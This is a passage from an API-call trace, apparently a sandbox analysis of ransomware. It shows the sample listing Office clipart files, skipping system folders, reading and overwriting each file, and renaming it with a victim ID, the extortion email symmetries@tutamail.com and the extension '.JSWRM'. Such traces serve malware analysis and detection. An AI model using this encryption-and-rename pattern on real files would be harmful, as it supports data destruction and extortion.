lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00350_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00350_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0095.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00350_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.917] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=48096) returned 1 [0095.918] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbbe0) returned 0x24d210 [0095.918] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xbbe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xbbe0, lpOverlapped=0x0) returned 1 [0095.923] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.923] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xbbe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xbbe0, lpOverlapped=0x0) returned 1 [0095.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.924] CloseHandle (hObject=0x314) returned 1 [0095.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0095.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0095.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0095.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0095.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0095.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.925] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00350_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00350_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0095.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.926] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x934c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00352_.WMF", cAlternateFileName="")) returned 1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2=".") returned 1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="..") returned 1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="...") returned 1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="windows") returned -1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="recovery") returned 1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="perflogs") returned 1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="documents and settings") returned 1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="system volume information") returned -1 [0095.926] lstrcmpiW (lpString1="SO00352_.WMF", lpString2="msocache") returned 1 [0095.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0095.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00352_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00352_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00352_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0095.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0095.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00352_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00352_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00352_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0095.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0095.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00352_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.927] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37708) returned 1 [0095.927] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9340) returned 0x24d210 [0095.928] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9340, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9340, lpOverlapped=0x0) returned 1 [0095.932] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.932] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9340, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9340, lpOverlapped=0x0) returned 1 [0095.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.933] CloseHandle (hObject=0x314) returned 1 [0095.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0095.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0095.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0095.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0095.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0095.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0095.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.934] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00352_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00352_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0095.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0095.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.934] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1948, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00364_.WMF", cAlternateFileName="")) returned 1 [0095.934] lstrcmpiW (lpString1="SO00364_.WMF", lpString2=".") returned 1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="..") returned 1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="...") returned 1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="windows") returned -1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="recovery") returned 1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="perflogs") returned 1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="documents and settings") returned 1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="system volume information") returned -1 [0095.935] lstrcmpiW (lpString1="SO00364_.WMF", lpString2="msocache") returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0095.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00364_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00364_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00364_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0095.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00364_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00364_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00364_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0095.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00364_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.936] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6472) returned 1 [0095.936] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1940) returned 0x205850 [0095.936] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1940, lpOverlapped=0x0) returned 1 [0095.938] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.938] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1940, lpOverlapped=0x0) returned 1 [0095.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.938] CloseHandle (hObject=0x314) returned 1 [0095.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0095.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0095.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0095.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0095.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0095.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.938] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00364_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00364_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0095.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0095.939] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51ea, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00367_.WMF", cAlternateFileName="")) returned 1 [0095.939] lstrcmpiW (lpString1="SO00367_.WMF", lpString2=".") returned 1 [0095.939] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="..") returned 1 [0095.939] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="...") returned 1 [0095.939] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="windows") returned -1 [0095.939] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="recovery") returned 1 [0095.939] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="perflogs") returned 1 [0095.939] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="documents and settings") returned 1 [0095.940] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.940] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="system volume information") returned -1 [0095.940] lstrcmpiW (lpString1="SO00367_.WMF", lpString2="msocache") returned 1 [0095.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0095.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00367_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00367_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00367_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0095.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0095.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00367_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00367_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00367_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0095.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00367_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.941] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20970) returned 1 [0095.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51e0) returned 0x24d210 [0095.942] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, 